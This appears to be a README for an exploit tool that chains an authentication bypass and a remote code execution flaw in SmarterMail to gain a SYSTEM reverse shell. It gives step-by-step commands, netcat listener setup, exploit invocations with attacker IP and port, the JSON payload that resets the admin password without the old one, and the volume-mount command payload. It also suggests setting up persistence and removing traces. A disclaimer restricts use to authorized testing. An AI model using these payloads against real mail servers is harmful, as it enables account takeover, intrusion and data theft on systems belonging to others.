Share
## https://sploitus.com/exploit?id=A6B71B64-5075-56F9-BE34-9159A476DC2F
# CVE-2025-52691 / WT-2026-0001 SmarterMail Exploit

## ๐Ÿšจ IMPORTANT NOTICE

**This tool is for authorized security testing and educational purposes only!**

- **Unauthorized use is illegal and unethical**
- **Only use on systems with explicit authorization**
- **Use at your own risk**
- **Users are responsible for compliance with all applicable laws**

---

## ๐Ÿ“‹ Overview

This exploit combines two critical vulnerabilities in SmarterMail:

1. **CVE-2025-52691**: Pre-Auth Remote Code Execution via File Upload
   - CVSS Score: 10.0 (Critical)
   - Affected Versions: Build 9406 and earlier, Build 16.3.6989.16341 and earlier
   - Fixed Versions: Build 9413 and later

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

2. **WT-2026-0001**: Authentication Bypass via Password Reset
   - CVE-ID not assigned
   - Affected Versions: Up to Build 9510
   - Fixed Versions: Build 9511 (January 15, 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

### Attack Vector

The exploit performs a 3-phase attack:

1. **Phase 1**: Authentication Bypass via WT-2026-0001
   - Change admin password without verification of old password
   
2. **Phase 2**: Admin Login with new password
   - Authenticate to SmarterMail Web Interface
   
3. **Phase 3**: RCE via Volume Mounts functionality
   - Create a Volume Mount with Reverse Shell Command
   - Execute OS commands with SYSTEM privileges

---

## Prerequisites

### System Requirements
- **Python 3.6+**
- **Netcat (nc)**
- **curl**
- **Linux/macOS/Windows (WSL)**

### Installation Instructions

```bash
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional
```

### Install Dependencies

```bash
# Python dependencies (if needed)
pip3 install requests
```

---

## Quick Start

### Method 1: Automated Setup (Recommended)

```bash
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh
```

### Method 2: Direct Execution

```bash
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```

### Method 3: With All Options

```bash
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"
```

---

## Detailed Instructions

### Step 1: Preparation

1. **Target Identification**
   ```bash
   # Check target host
   curl -I http://192.168.1.100:9998
   
   # Identify SmarterMail version
   # (Usually in login page or HTTP headers)
   ```

2. **Listener Setup**
   ```bash
   # In Terminal 1: Start listener
   nc -lvnp 4444
   
   # The listener must be running before the exploit is executed
   ```

3. **Network Validation**
   ```bash
   # Ensure connection between attacker and target is possible
   ping 192.168.1.100
   nc -zv 192.168.1.100 9998
   ```

### Step 2: Exploit Execution

```bash
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```

### Step 3: After Exploit

1. **Shell Connection**
   ```bash
   # In the listener terminal, a connection should now appear
   # You should have a SYSTEM shell
   ```

2. **Verify Access**
   ```bash
   # In the obtained shell
   whoami
   hostname
   ipconfig /all  # Windows
   ifconfig       # Linux
   ```

3. **Persistent Access**
   ```bash
   # Optional: Set up persistence
   # Windows: Install as service
   # Linux: Cron job or systemd service
   ```

---

## ๐Ÿ”ง Configuration Options

### Exploit.py Parameters

| Parameter | Description | Default Value |
|-----------|-------------|---------------|
| `-H, --host` | Target host (required) | - |
| `-P, --port` | Target port | 9998 |
| `-A, --attacker-ip` | Attacker IP for reverse shell (required) | - |
| `-p, --attacker-port` | Attacker port for reverse shell (required) | - |
| `-d, --debug` | Enable debug mode | False |
| `--admin-username` | Admin username | admin |
| `--new-password` | New admin password | NewPassword123!@# |

### Run_Exploit.sh Parameters

| Parameter | Description |
|-----------|-------------|
| `-t, --target` | Target host |
| `-p, --port` | Target port |
| `-a, --attacker-ip` | Attacker IP |
| `-l, --listener-port` | Listener port |
| `-n, --new-password` | New admin password |
| `-u, --admin-user` | Admin username |
| `-d, --debug` | Debug mode |
| `--auto` | Automated mode |

---

## Examples

### Example 1: Basic Usage

```bash
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```

### Example 2: With Custom Credentials

```bash
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"
```

### Example 3: Debug Mode

```bash
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d
```

### Example 4: Automated Setup

```bash
./run_exploit.sh --auto
```

---

## Technical Details

### Phase 1: Authentication Bypass

**Endpoint**: `POST /api/v1/auth/force-reset-password`

**Payload**:
```json
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}
```

**Success Response**:
```json
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}
```

### Phase 2: Admin Login

**Endpoint**: `POST /api/v1/auth/login`

**Payload**:
```json
{
  "username": "admin",
  "password": "NewPassword123!@#"
}
```

### Phase 3: RCE via Volume Mounts

**Endpoint**: `POST /api/v1/settings/volume-mounts`

**Payload**:
```json
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}
```

---

## Troubleshooting

### Common Issues


#### 1. Port blocked
```bash
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998
```

#### 2. Listener not reachable
```bash
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444
```

#### 3. Authentication failed
```bash
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)
```

#### 5. RCE failed
```bash
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system
```

### Debug Mode

Enable debug mode for detailed output:

```bash
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d
```

---

## โš ๏ธ Security Notes

### Legal Aspects

- **Only perform authorized tests**
- **Obtain written permission**
- **Ensure compliance with local laws**
- **No testing on production systems**

### Security Precautions

1. **Test Environment**: Always test in controlled environments
2. **Target Validation**: Ensure target is a test system
3. **Network Isolation**: Separate test systems from production network
4. **Documentation**: Document all tests
5. **Cleanup**: Remove all traces after testing

### Responsible Use

- **Do not cause damage**
- **Do not steal or manipulate data**
- **Do not disable systems**
- **Be transparent to responsible parties**

---

## Updates and Maintenance

### Version Notes

- **v1.0**: Initial version with full functionality
- **Future Updates**: Improvements to error handling and stability

## ๐Ÿ™ Acknowledgments

- **watchTowr Labs** for the original research
- **Security Research Community** for support
- **All who contributed to improvements**

---

**โš ๏ธ Remember: With great power comes great responsibility!**